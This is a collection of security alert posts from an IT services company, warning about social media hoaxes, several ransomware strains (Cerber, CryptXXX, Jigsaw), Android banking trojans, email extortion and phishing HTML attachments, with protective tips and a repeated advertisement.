ALERT:  New Facebook Hoax

A new version of an old hoax is spreading fast through Facebook pages everywhere.

 

 

CyberCriminals are cashing in on people’s fear that Facebook is going to start charging for its service.

The message specifics vary, but the gist of the message is that Facebook is going to start charging for Facebook accounts sometime in the near future (times vary between “tomorrow” to “this summer”).  The message goes on to state that if current users copy and paste the message into their own status, that their icon will turn blue, and their account will be “safe”.

This is a new version of an old hoax, which began circulating as early as 2006.

A Simple Rule of Thumb Regarding Social Media

Any message that claims that a particular online service provider will start charging you or will close your account unless you send on the information to others, is a hoax.  If you receive this Facebook version, or any of the other versions of this hoax, please DO NOT pass it on to others.  Reposting does nothing other than clutter social networks and inboxes with even more useless information.  Also, CyberCriminals have ways of collecting (read “make $$$$”) off of such scams.  

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

ALERT:  New Ransomware Targets MS Office 365 Users

A new strain of the Cerber Ransomware is targeting MS Office 365 email users with a massive attack that has the ability to bypass the Office 365’s built-in security tools.  

A report recently released by cloud security provider Avanan shows a massive zero-day attack targeting Office 365 users with phishing emails containing attachments with malicious files.

Microsoft reported in its 1st quarter of 2016 that there are almost 18.2 million Office 365 subscribers.  And while Avanan does not specify the number of users that have been hit by the ransomware, Avanan does state:

“While difficult to precisely measure how many users got infected, roughtly 57 pecent of organizations using Office 365 received at least one copy of the malware into one of their corporate mailboxes during the time of attack.”

The Cerber Ransomware uses the ever-popular social engineering to try to trick users to allow macros, very similar to the recent Locky and Dridex attacks.  The difference is that Cerber not only encrypts user files, and displays a ransom note, but it also takes over the user’s audio system to read out its ransom note informing them that their files were encrypted.

How To Protect Yourself

I’d love to tell you that there was some magic potion to sprinkle, or some magic software to download, that would keep you safe from Cerber Ransomware.  However, the steps to avoid becoming a victim to this strain of ransomware, are much like the steps to avoid the rest:

1. Backups.  Backups.  Backups.  Maintain current, and reliable backups of all pertinent files.  Nothing beats a good, reliable backup!  Backing up your data now can prevent a lot of expensive headaches in the future.
2. AntiMalware Software.  Regularly run AntiMalware software to block known strains of ransomware.
3. Update.  Update.  Update.  Keep all hardware, software, and Operating Systems up-to-date.  
4. Educate.  Educate.  Educate. Make sure employees and coworkers know about current viruses/malware, and what to look for.  Print & post our “Red Flag Emails” for easy reference on what to look for in scam emails.
5. Install Ad Blockers When Possible.  uBlock Origin is a great ad blocker for Chrome and other browsers.
6. Block Extensions via Email.  A good spam blocker will usually handle this for you.
7. Limit permissions.  Allow “Read/Write Access Only” when necessary.
8. Avoid mapping network shares.  If you have to use them, hide them whenever possible.  This is sometimes as simple as appending a “$” to your share name.

 

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

 ALERT:  FBI Warns Email Extortion Heating Up for Summer!

The FBI’s Internet Crime Complaint Center (IC3) has issued a warning that  email extortion campaigns have heated up recently.  The IC3 states that the recent increase in email extortion stems from recent data breaches in companies such as Ashley Madison, the IRS, Anthem, and others where millions of records with highly personal information was stolen.

With extortion email scams, victims are informed that the CyberCriminals have their highly personal information.  The victims are instructed to pay, usually within a short time period.  The ransom amount typically ranges between 2-5 Bitcoins (approximately $300-$1400 US, depending on exchange rates).

Victims are told that if they do not pay the ransom, their personal information (such as name, phone number, address credit card info. and other confidential information) will be sent to the victim’s social media contacts, family, and friends.

Do NOT answer these demands, and do NOT pay anything.

If you do, your data will be sold to other scammers who will continue to haunt & extort you for further fund.

Report this scam to the FBI’s Internet Crime Complaint Center (IC3), at:  http://www.ic3.gov/default.aspx

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

ALERT:  Evil Android Trojan Empties Your Bank Account

The FBI has identified 2 versions of malware for Android (SlemBunk and Marcher) actively phishing for financial institutions’ customer credentials.  According to cyber threat security reports, both types of malware have targeted foreign financial institutions since 2014, gradually broadening the list to include Western banks, and offered the malware for lease or purchase in underground forums.

SlemBunk apps often masquerade as common, popular applications, and stay incognito after running the 1st time.  They have the ability to phish for, and harvest, authentication credentials when specified banking and other similar apps are launched.  Slembunk currently spoofs the apps of 31 banks across the globe – some of which are among the biggest banks in the world – as well as users of 2 popular mobile payment service provider apps.

Users will only get infected if the malware is accidentally downloaded from a malicious website, the new version of the malware being distributed by porn websites.  Users who visit these sites are incessantly prompted to download Adobe Flash update to view the porn, and doing so, downloads the malware.  

When the app is launched for the 1st time, it activates the registered receiver, which subsequently starts the monitoring service in the background.  On the surface, it pops up a fake UI claiming to be Adobe Flash Player, or whatever it was advertised as being, and requests to be the device admin.  Upon being granted admin privileges, it removes the fake icon from the device, and the malware monitors the infected phone for the launch of a targeted mobile banking app.  When a mobile banking/payment app is launched, the malware injects a phishing overlay over the legitimate banking/payment app’s user interface (aka login screen).  The malware then uses the fake login screen to steal the victim’s banking credentials.

How to Avoid Mobile Device Malware:

1. If you receive a pop-up telling you that you need to download Adobe Flash or any other software, whether you’re on your desktop or on your mobile device, go directly to the Adobe website or the app store (type it in the address bar), and download it from there.
2. Keep Android devices updated.

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

ALERT:  HTML Attachments

In the past, spam filters have been able to catch most of the malicious emails, based on the types of attachments they were sending (and trying to trick people into opening the attachments, which then downloads malicious files onto your device).  Most of the malicious attachments used in the past were “.DOC” or “.JS” files, used mainly for ransomware attacks.

Now, CyberCriminals are trying to trick spam filters into letting their malicious emails through, by sending .HTML attachments, also knows as “attackments”.

CyberCriminals are using these attackments for credentials “phishing” for a few reasons.  Namely:

1. Reduced chance of anti-virus detection:  Carefully crafted .HTML files can reduce the chances that phishing emails with these attachments will be stopped by email security software or devices.  .HTML files are not commonly associated with email-borne attacks (at least, not until recently).  .HTML files can be used to embed redirects that can evade antivirus scanners that check only URLs that appear in the bodies of emails.  .HTML files can also be used to deliver obscure web pages that might slip past scanners that do check .HTML attachments.
2. Users are familiar with these attachments, and usually don’t see them as harmful.  Users and employees may be familiar with .HTML attachments, as they are often used by banks and other financial institutions to send secure information and documents.  If your company routinely interacts with financial institutions, your employees may view .HTML attachments as simply routine and non-threatening.

Unfortunately, CyberCriminals have recently taken to using .HTML attachments to spoof bank login pages, popular online services, and secure messages from financial institutions (financial institutions often use “.HTML” attachments to send secure messages).

Your spam filters may miss these based on the “.HTML” file.

If you receive an email with an .HTML attachment, be wary!  

Do not open it unless you know 100% that it is legitimate, have requested the link to be sent, or have verified with the sender that the attachment is legitimate.

 

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

ALERT:  New Ransomware Also Steals Your Bitcoins

 

With the rash of new ransomware strains out there, you knew they were going to up the ante somehow…

 

CryptXXX is built by the same CyberCriminals that are behind the Revelton malware.  It is an attempt to one-up the release of the Locky ransomware by their CyberCriminal Competitors.

CryptXXX currently spreads through the Angler Exploit Kit which infects the PC with the Bedep Trojan, which drops information theft software on the PC, then adds professional-grad encryption adding a “.crypt” extension to the filenames.  

This ransomware encrypts files locally, and on all mounted drives, and demands $500 Bitcoin/PC to unlock the encrypted files.  However, they continue to add insult to injury by also stealing Bitcoins, as well as a large range of data.

CryptXXX tried to avoid detection through “random delayed” execution (which attempts to easily connect the infection to the delivery vector), anti-Virtual Machine, and anti-analysis functions (eg. checking CPU names in the registry, monitoring for mouse events).

The CyberCriminals behind this ransomware is highly skilled and experienced, which means this is professional-grade ransomware.  Proofpoint researchers report “Those [ransomware infections] associated with more experienced [CyberCriminals], (such as Locky) have become widespread quickly…Given Revelton’s long history of successful and large-scale malware distribution, we expect CryptoXXX to become widespread.  Based on the large number of translations available for the [Bitcoin] payment page, it appears that the Revelton team shares those expectations.”

The ransomware will initially be spread through drive-by downloads, but a deluge of phishing emails can be expected to follow shortly.

What Can You Do to Avoid Becoming a Ransomware Victim:

1. Backups.  Backups.  Backups.  Maintain current, and reliable backups of all pertinent files.  Nothing beats a good, reliable backup!  Backing up your data now can prevent a lot of expensive headaches in the future.
2. AntiMalware Software.  Regularly run AntiMalware software to block known strains of ransomware.
3. Update.  Update.  Update.  Keep all hardware, software, and Operating Systems up-to-date.  
4. Educate.  Educate.  Educate. Make sure employees and coworkers know about current viruses/malware, and what to look for.  Print & post our “Red Flag Emails” for easy reference on what to look for in scam emails.
5. Install Ad Blockers When Possible.  uBlock Origin is a great ad blocker for Chrome and other browsers.
6. Block Extensions via Email.  A good spam blocker will usually handle this for you.
7. Limit permissions.  Allow “Read/Write Access Only” when necessary.
8. Avoid mapping network shares.  If you have to use them, hide them whenever possible.  This is sometimes as simple as appending a “$” to your share name.

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

ALERT:  Prince’s Last Words

Yesterday, news broke that Prince (aka Prince Rogers Nelson) was found dead in his home in Minneapolis at age 57. 

CyberCriminals eager, as always, to take advantage of any tragedy, are up to their same tricks.  A series of email scams are currently being circulated, one of which is most likely to be a supposed video of Prince’s last words caught on video (this is a frequent scam to use after an especially unexpected celebrity death).

Whatever ploy is being used, you can be sure to end up with either infected computers at home or in the office, giving out personal information, or unleashing ransomware on the network.

Beware of any email, attachments, any social media, texts on your phone…anything.

Another heads-up:

With the recent eqrthquakes in Ecuador and Japan, there are charity scams rearing their ugly heads.  If you want to make donations, please go to your favorite charity website directly by opening your browser and typing in their link in the address bar.  DO NOT click on any links or open any attachments in emails.

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks

ALERT:  Jigsaw Sinks to New Low…Even for Ransomware

Being infected by ransomware is bad enough.  Add in being taunted by old horror movie pictures while it slowly deletes your encrypted files, all while increasing the ransom demand, until you pay for the decryption key.  And if you reboot your PC, you’re punished with the instant deletion of 1,000 of your files.

Jigsaw, a new strain of ransomware tries to increase the pressure on victims to pay, by referencing the horror movie “Saw”.  In fact, the ransomware is named after the film’s fictional serial killer John Kramer’s nickname the “Jigsaw Killer”.  The ransomware, still drawing motivation from the horror movie, communicates with victims using a puppet called “Billy”, and uses the red clock to count down to deadlines imposed, which are both used by the killer in the movie.  However, in the case of the ransomware, the clock shows victims how much time is left before more files get deleted, and the ransom demand increases.  After 72 hours, the ransomware deletes every encrypted file on the PC.

How the ransomware attack unfolds, as seen on an infected PC. (Source:  Forcepoint.)

This latest version, in a long list of versions, “appears to have been coded on March 23 and to have been used in live attacks by the end of the month” states Andy Settle, head of special investigations at Ryatheon’s cybersecurity business Forcepoint.  “This malicious program starts encrypting your files while adding, with no irony, the ‘.FUN’ file extention.”  

“Using horror movie images and references to cause distress in the victim is a new low.”

Jason Sumalapao, malware analyst at Trend Micro, states in a blog post that the ransom note exists in both English and Portutuese-language versions, and that the lowest possible amount that victims can pay, before the demand starts increasing, ranges from $20 to $150 USD in bitcoins.

Jigsaw appears to be distributed through adware and “grayware” (potentially unwanted applications, such as free toolbars), as well as through ‘adult content’ sites, reports Trend Micro.  

Forcepoint states that the producers of Jigsaw attempted to prevent detection by writing the ransomware in ‘.NET’ code.  However, this attempt failed, and security researchers have been able to recover the encryption key, as well as 100 different bitcoin payment addresses.  This information has since been shared with authorities.  Since the encryption key was discovered, security researchers have been able to publish instructions on how to remove Jigsaw infections.  However, it’s probably not long before Jigsaw producers correct their coding error that lead to the discovery of the decryption key.

How to Avoid Jigsaw and Other Ransomware:

1. Backups.  Backups.  Backups.  Maintain current, and reliable backups of all pertinent files.  
2. AntiMalware Software.  Regularly run AntiMalware software to block known strains of ransomware.
3. Update.  Update.  Update.  Keep all hardware, software, and Operating Systems up-to-date.  
4. Educate.  Educate.  Educate.  Keep all employees and coworkers informed about current security threats, and what to look for.  Check out our ‘Red Flag Emails‘ for tips on what to look for in scam emails.
5. Install Ad Blockers When Possible.  uBlock Origin is a great ad blocker for Chrome and other browsers.
6. Block Extensions via Email.  A good spam blocker will usually handle this for you.

 

You can’t stop CyberCriminals from targeting your company or employees.

But you can be prepared for their arrival, and have full shields up.

Got CyberBugs?

Call 1-204-800-3166

For Cyber-Extermination!

#itthatworks